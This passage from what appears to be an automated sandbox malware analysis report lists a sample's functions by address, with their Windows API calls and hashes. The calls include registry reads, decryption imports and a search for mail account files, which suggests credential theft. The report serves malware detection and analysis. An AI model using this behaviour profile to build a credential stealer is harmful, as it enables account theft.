                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                      • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                      • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408AA5 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                      • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406CCE Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3831604043-0
                                                                                                                                                                                                                      • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                      • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406E26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                        • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                      • String ID: Arial
                                                                                                                                                                                                                      • API String ID: 3853255127-493054409
                                                                                                                                                                                                                      • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                      • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444A0F Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040CB90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                        • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                      • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                      • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444A4E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444A6B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040472F Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 145871493-0
                                                                                                                                                                                                                      • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                      • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004103E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                                        • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                                        • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                                        • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                      • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                      • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404780 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                      • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406AB8 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                      • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410166 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                      • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410663 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                      • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407D1F Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                      • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410411 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                      • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406D1F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                                      • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 004047C6 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 2238633743-192783356
                                                                                                                                                                                                                      • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                                      • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402DA5 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                        • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
